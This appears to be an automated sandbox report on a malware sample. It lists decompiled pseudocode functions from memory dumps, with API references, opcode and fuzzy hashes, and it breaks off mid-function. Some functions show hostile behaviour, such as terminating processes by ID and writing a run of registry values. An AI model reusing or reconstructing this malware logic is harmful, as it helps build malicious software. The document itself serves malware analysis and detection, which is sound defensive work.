                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: lstrcat$lstrlen$ExchangeInterlocked
                                • String ID:
                                • API String ID: 3054446656-0
                                • Opcode ID: d0f7db6a2eaa175a4147023097417ab36141b81ead26d735a3caefd07758de2d
                                • Instruction ID: a355a8b41de2f22a2f8ac725f9ab5c4ba2591266dfbc94b624f7f639b0b60c1b
                                • Opcode Fuzzy Hash: d0f7db6a2eaa175a4147023097417ab36141b81ead26d735a3caefd07758de2d
                                • Instruction Fuzzy Hash: 8C31B676E20155EBDB14EFE4DC85BAE3BB6DF84700F10C564F50696289C678DA50CBA0
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E0228EB5F() {
                                
                                				_push(0xffffffff);
                                				goto [far dword [eax-0x8];
                                			}



                                0x0228eb62
                                0x0228eb63

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: __common_dcos_data__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs
                                • String ID:
                                • API String ID: 3700507067-0
                                • Opcode ID: aa82778aa52d48a7cd417fd43269b89f624d09216a3eaffbf5f2a4986932b046
                                • Instruction ID: 482896f3c2070e34366fd0a916cd99f301d713d6756c82e040ae9de715db52bc
                                • Opcode Fuzzy Hash: aa82778aa52d48a7cd417fd43269b89f624d09216a3eaffbf5f2a4986932b046
                                • Instruction Fuzzy Hash: 0141C1B1C023419FC722AFE4DE49A98BFB8FB05721F11426BF655A72E5D3748941CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 37%
                                			E00427915() {
                                
                                				_push(0xffffffff);
                                				goto [far dword [eax-0x8];
                                			}



                                0x00427918
                                0x00427919

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: __common_dcos_data__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs
                                • String ID:
                                • API String ID: 3700507067-0
                                • Opcode ID: aa82778aa52d48a7cd417fd43269b89f624d09216a3eaffbf5f2a4986932b046
                                • Instruction ID: 731985ee1bf752d327a80d9b2f130e4ff9c235fcc45efd243eef1a142426bddb
                                • Opcode Fuzzy Hash: aa82778aa52d48a7cd417fd43269b89f624d09216a3eaffbf5f2a4986932b046
                                • Instruction Fuzzy Hash: 0F411071E053409FC721DFA4EE49A99BFB8FB05320F60426FE655A32E1D3780A41CB68
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E0228EB56() {
                                				intOrPtr _v117;
                                				intOrPtr* _t3;
                                				void* _t5;
                                				void* _t9;
                                
                                				asm("pushad");
                                				if(_t9 > 0) {
                                					L3:
                                					goto [far dword [eax-0x8];
                                				}
                                				 *_t3 =  *_t3 + _t3;
                                				 *_t3 =  *_t3 + _t3;
                                				_v117 = _v117 + _t5;
                                				_push(0xffffffff);
                                				goto L3;
                                			}







                                0x0228eb56
                                0x0228eb57
                                0x0228eb63
                                0x0228eb63
                                0x0228eb63
                                0x0228eb59
                                0x0228eb5c
                                0x0228eb5e
                                0x0228eb62
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: __common_dcos_data__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs
                                • String ID:
                                • API String ID: 3700507067-0
                                • Opcode ID: bc1941cb864fcda01438c1e92b4fe03769009c555685705d70efa8dcbffdbf09
                                • Instruction ID: f8ba364a1a9c7bdd48c503abacd7ff194abffef0962e72477ae485fe2d50facf
                                • Opcode Fuzzy Hash: bc1941cb864fcda01438c1e92b4fe03769009c555685705d70efa8dcbffdbf09
                                • Instruction Fuzzy Hash: 7F2191B2942301EFC721EFA4DE49A99BF78FB04321B10423AF615A32E4D7748A04CB14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 72%
                                			E0042790C() {
                                				intOrPtr _v117;
                                				intOrPtr* _t3;
                                				void* _t5;
                                				void* _t9;
                                
                                				asm("pushad");
                                				if(_t9 > 0) {
                                					L3:
                                					goto [far dword [eax-0x8];
                                				}
                                				 *_t3 =  *_t3 + _t3;
                                				 *_t3 =  *_t3 + _t3;
                                				_v117 = _v117 + _t5;
                                				_push(0xffffffff);
                                				goto L3;
                                			}







                                0x0042790c
                                0x0042790d
                                0x00427919
                                0x00427919
                                0x00427919
                                0x0042790f
                                0x00427912
                                0x00427914
                                0x00427918
                                0x00000000

                                APIs
                                Memory Dump Source
                                • Source File: 00000000.00000002.314403919.0000000000426000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.314272065.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314281545.0000000000401000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314297689.0000000000402000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314331044.0000000000425000.00000080.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314484210.0000000000429000.00000040.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.314601354.0000000000436000.00000080.00000001.01000000.00000003.sdmpDownload File
                                Similarity
                                • API ID: __common_dcos_data__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs
                                • String ID:
                                • API String ID: 3700507067-0
                                • Opcode ID: bc1941cb864fcda01438c1e92b4fe03769009c555685705d70efa8dcbffdbf09
                                • Instruction ID: ca86c5ddc602ed712cac595b2e55ca82dd550ceb8ff6ab42764b2ee7f7f8e3c9
                                • Opcode Fuzzy Hash: bc1941cb864fcda01438c1e92b4fe03769009c555685705d70efa8dcbffdbf09
                                • Instruction Fuzzy Hash: 492171B2A45304EFC711DFA4EE4AA9A7F78F704325B10423BE615A72E0D7784A44CB58
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E02209ACF(void _a4) {
                                				long _v8;
                                				void* _v12;
                                				void* _v16;
                                				CHAR* _t13;
                                				int _t18;
                                
                                				_v8 = 0;
                                				_t13 =  *0x21e17f8; // 0x22026e0
                                				_v12 = CreateFileA(_t13, 0x40000000, 0, 0, 3, 0, 0);
                                				if(_v12 != 0xffffffff) {
                                					WriteFile(_v12,  &_a4, "true",  &_v8, 0);
                                					return CloseHandle(_v12);
                                				}
                                				_t18 = OpenProcess(0x1f0fff, 0, _a4);
                                				_v16 = _t18;
                                				if(_v16 != 0) {
                                					TerminateProcess(_v16, 0);
                                					_t18 = CloseHandle(_v16);
                                				}
                                				return _t18;
                                			}








                                0x02209ad5
                                0x02209aeb
                                0x02209af7
                                0x02209afe
                                0x02209b42
                                0x00000000
                                0x02209b4c
                                0x02209b0b
                                0x02209b11
                                0x02209b18
                                0x02209b20
                                0x02209b2a
                                0x02209b2a
                                0x00000000

                                APIs
                                • CreateFileA.KERNEL32(022026E0,40000000,00000000,00000000,00000003,00000000,00000000,?,02209E89), ref: 02209AF1
                                • OpenProcess.KERNEL32(001F0FFF,00000000,000000FF), ref: 02209B0B
                                • TerminateProcess.KERNEL32(00000000,00000000), ref: 02209B20
                                • CloseHandle.KERNEL32(00000000), ref: 02209B2A
                                • WriteFile.KERNEL32(000000FF,000000FF,?,00000000,00000000), ref: 02209B42
                                • CloseHandle.KERNEL32(000000FF), ref: 02209B4C
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: CloseFileHandleProcess$CreateOpenTerminateWrite
                                • String ID:
                                • API String ID: 2603052737-0
                                • Opcode ID: 549b068c9382c2e1f7f5a475f36b5448356c1a58a7d24b3428637c85f5d809a9
                                • Instruction ID: bcca69972349d389d1a2ccb9a5a5378cef679f1c6e5fd73c4520894873fdcf9e
                                • Opcode Fuzzy Hash: 549b068c9382c2e1f7f5a475f36b5448356c1a58a7d24b3428637c85f5d809a9
                                • Instruction Fuzzy Hash: 7A01DB75E90208FBDB10DFE0DC49F9E7BB8AB48B11F108544F615AA2C0D7B46AD4CB54
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 31%
                                			E02204F36() {
                                				void* _t51;
                                				signed int _t52;
                                				void* _t83;
                                				void* _t85;
                                
                                				L0:
                                				while(1) {
                                					L0:
                                					 *(_t83 - 0x1634) =  *(_t83 - 0x1634) + 1;
                                					if( *(_t83 - 0x1634) >= 8) {
                                						break;
                                					}
                                					L2:
                                					_t52 = "alfoC:\\Windows\\"; // 0x6f666c61
                                					wsprintfA(_t83 - 0x120, 0x2203c50, _t52 *  *(_t83 - 0x1634));
                                					_t85 = _t85 + 0xc;
                                					 *(_t83 - 0x1644) =  *(_t83 - 0x1634);
                                					 *(_t83 - 0x1644) =  *(_t83 - 0x1644) - 1;
                                					if( *(_t83 - 0x1644) <= 6) {
                                						L3:
                                						switch( *((intOrPtr*)( *(_t83 - 0x1644) * 4 +  &M0220546A))) {
                                							case 0:
                                								L4:
                                								 *(_t83 - 0x163c) = 1;
                                								goto L11;
                                							case 1:
                                								L5:
                                								 *(__ebp - 0x163c) = 0;
                                								goto L11;
                                							case 2:
                                								L6:
                                								 *(__ebp - 0x163c) = 0;
                                								goto L11;
                                							case 3:
                                								L7:
                                								 *(__ebp - 0x163c) = 0x1e;
                                								goto L11;
                                							case 4:
                                								L8:
                                								 *(__ebp - 0x163c) = 0x8f;
                                								goto L11;
                                							case 5:
                                								L9:
                                								_push(0x8e);
                                								_push(0x21e2244);
                                								__eax = E02204A5B(__ecx, __eflags);
                                								__esp = __esp + 8;
                                								_push(__eax);
                                								_push(__ebp - 0x162c);
                                								__eax =  *0x21e1148();
                                								goto L11;
                                							case 6:
                                								L10:
                                								_push(0x81);
                                								_push(0x21e21c0);
                                								__eax = E02204A5B(__ecx, __eflags);
                                								__esp = __esp + 8;
                                								_push(__eax);
                                								__eax = __ebp - 0x162c;
                                								_push(__ebp - 0x162c);
                                								__eax =  *0x21e1148();
                                								goto L11;
                                						}
                                					}
                                					L11:
                                					if( *(_t83 - 0x1634) > 5) {
                                						RegSetValueExA( *(_t83 - 0x1638), _t83 - 0x120, 0, 1, _t83 - 0x162c,  *0x21e114c(_t83 - 0x162c));
                                					} else {
                                						RegSetValueExA( *(_t83 - 0x1638), _t83 - 0x120, 0, "true", _t83 - 0x163c, "true");
                                					}
                                				}
                                				L15:
                                				RegCloseKey( *(_t83 - 0x1638));
                                				 *( *(_t83 + 8)) = 1;
                                				( *(_t83 + 8))[1] = 0;
                                				( *(_t83 + 8))[1] = 0;
                                				( *(_t83 + 8))[1] = 0x1e;
                                				( *(_t83 + 8))[2] = 0x8f;
                                				E0221772B( &(( *(_t83 + 8))[3]), 0x21e2244, 0x8f);
                                				_t51 = E0221772B( &(( *(_t83 + 8))[0x103]), 0x21e21c0, 0x82);
                                				if( *(_t83 - 0x1640) != 0) {
                                					_t51 = GlobalFree( *(_t83 - 0x1640));
                                				}
                                				 *((intOrPtr*)(_t83 - 4)) = 0xffffffff;
                                				 *[fs:0x0] =  *((intOrPtr*)(_t83 - 0x10));
                                				return _t51;
                                			}







                                0x02204f36
                                0x02204f36
                                0x02204f36
                                0x02204f3f
                                0x02204f4c
                                0x00000000
                                0x00000000
                                0x02204f52
                                0x02204f52
                                0x02204f6b
                                0x02204f71
                                0x02204f7a
                                0x02204f89
                                0x02204f96
                                0x02204f9c
                                0x02204fa2
                                0x00000000
                                0x02204fa9
                                0x02204fa9
                                0x00000000
                                0x00000000
                                0x02204fb5
                                0x02204fb5
                                0x00000000
                                0x00000000
                                0x02204fc1
                                0x02204fc1
                                0x00000000
                                0x00000000
                                0x02204fcd
                                0x02204fcd
                                0x00000000
                                0x00000000
                                0x02204fd9
                                0x02204fd9
                                0x00000000
                                0x00000000
                                0x02204fe5
                                0x02204fe5
                                0x02204fea
                                0x02204fef
                                0x02204ff4
                                0x02204ff7
                                0x02204ffe
                                0x02204fff
                                0x00000000
                                0x00000000
                                0x02205007
                                0x02205007
                                0x0220500c
                                0x02205011
                                0x02205016
                                0x02205019
                                0x0220501a
                                0x02205020
                                0x02205021
                                0x00000000
                                0x00000000
                                0x02204fa2
                                0x02205027
                                0x0220502e
                                0x0220507a
                                0x02205030
                                0x0220504b
                                0x0220504b
                                0x02205080
                                0x02205085
                                0x0220508c
                                0x02205095
                                0x0220509e
                                0x022050a5
                                0x022050ac
                                0x022050b5
                                0x022050cd
                                0x022050e8
                                0x022050f7
                                0x02205100
                                0x02205100
                                0x02205106
                                0x0220545c
                                0x02205469

                                APIs
                                • wsprintfA.USER32 ref: 02204F6B
                                • lstrcpy.KERNEL32(?,00000000), ref: 02204FFF
                                • lstrcpy.KERNEL32(?,00000000), ref: 02205021
                                • RegSetValueExA.ADVAPI32(?,?,00000000,?,?,?), ref: 0220504B
                                • lstrlen.KERNEL32(?), ref: 0220505A
                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,00000000), ref: 0220507A
                                • RegCloseKey.ADVAPI32(?), ref: 0220508C
                                • GlobalFree.KERNEL32(00000000), ref: 02205100
                                • wsprintfA.USER32 ref: 02205153
                                • RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,00000004), ref: 0220518F
                                • RegCloseKey.ADVAPI32(?), ref: 0220543A
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.317172937.0000000002200000.00000040.00001000.00020000.00000000.sdmp, Offset: 021E0000, based on PE: true
                                • Associated: 00000000.00000002.317150458.00000000021E0000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317383685.0000000002287000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317494222.000000000228A000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317561703.000000000228D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                • Associated: 00000000.00000002.317580917.0000000002295000.00000040.00001000.00020000.00000000.sdmpDownload File
                                Similarity
                                • API ID: Value$Closelstrcpywsprintf$FreeGlobalQuerylstrlen
                                • String ID: alfoC:\Windows\
                                • API String ID: 3359840872-2437302347
                                • Opcode ID: 30c257aa66d9567a6a17794a8d42144ed3432e1d8bcad30a1e3950a83039a271
                                • Instruction ID: 38b16560039dad8fd6a5db47df7fa844b4c5f8688edc0ca3eb62dfbf03f5411b
                                • Opcode Fuzzy Hash: 30c257aa66d9567a6a17794a8d42144ed3432e1d8bcad30a1e3950a83039a271
                                • Instruction Fuzzy Hash: 54418EB5C21228DBDB20DF90CC85FEDB375BB58301F4882CAE51966285DAB25BE4CF50
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 22%
                                			E0228ECF0(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr _a722216000) {
                                				signed int _v8;
                                				char _v16;
                                				intOrPtr _v20;
                                				intOrPtr _v28;
                                				signed int _v52;
                                				char _v96;
                                				char _v100;
                                				char _v104;
                                				char _v112;
                                				char _v116;
                                				intOrPtr* _v120;
                                				intOrPtr* _t28;
                                				void* _t31;
                                				signed int _t41;
                                				intOrPtr _t44;
                                				intOrPtr _t45;
                                				intOrPtr _t46;
                                				signed char _t48;
                                				intOrPtr _t55;
                                				void* _t57;
                                				void* _t59;
                                				intOrPtr* _t62;
                                				void* _t64;
                                				intOrPtr _t65;
                                				intOrPtr _t68;
                                				intOrPtr _t69;
                                				intOrPtr _t70;
                                
                                				_t61 = __esi;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *__eax =  *__eax + __eax;
                                				 *((intOrPtr*)(__ecx + __eax)) =  *((intOrPtr*)(__ecx + __eax)) + __ecx;
                                				 *__eax =  *__eax + __eax;
                                				_t65 = _t68;
                                				 *[fs:0x0] = _t68;
                                				_t69 = _t68 - 0x68;
                                				_v28 = _t69;
                                				_v8 = 0;
                                				_t59 = 2;
                                				 *0x4020d4(_t59, __edi, __esi, __ebx,  *[fs:0x0], 0x401830, 0x4020f8, 0xffffffff, _t64);
                                				 *0x403090 =  *0x403090 | 0xffffffff;
                                				 *0x403094 =  *0x403094 | 0xffffffff;
                                				 *((intOrPtr*)( *0x4020d0())) =  *0x40308c;
                                				_t28 =  *0x4020cc();
                                				_t55 =  *0x403088;
                                				 *_t28 = _t55;
                                				 *0x403098 =  *((intOrPtr*)( *0x4020c8));
                                				_t31 = E0228F07E( *((intOrPtr*)( *0x4020c8)), _t55, _t57, _t59, __esi);
                                				if( *0x403070 == 0) {
                                					_t31 =  *0x4020c4();
                                					_t55 = 0x401822;
                                				}
                                				L0228F069(_t31, _t55, _t61);
                                				E0228F063(_t55, _t61);
                                				_v112 =  *0x403084;
                                				 *0x4020bc( &_v100,  &_v116,  &_v104,  *0x403080,  &_v112, 0x403008, 0x40300c);
                                				_push(0x403004);
                                				_push(0x403000);
                                				E0228F063(_t55, _t61);
                                				_t70 = _t69 + 0x24;
                                				_t41 =  *0x4020b8;
                                				_t62 =  *_t41;
                                				if(_t62 != 0) {
                                					_v120 = _t62;
                                					if( *_t62 == 0x22) {
                                						do {
                                							_t62 = _t62 + _t59;
                                							_v120 = _t62;
                                							_t45 =  *_t62;
                                						} while (_t45 != 0 && _t45 != 0x22);
                                						if( *_t62 == 0x22) {
                                							L9:
                                							_t62 = _t62 + _t59;
                                							_v120 = _t62;
                                						}
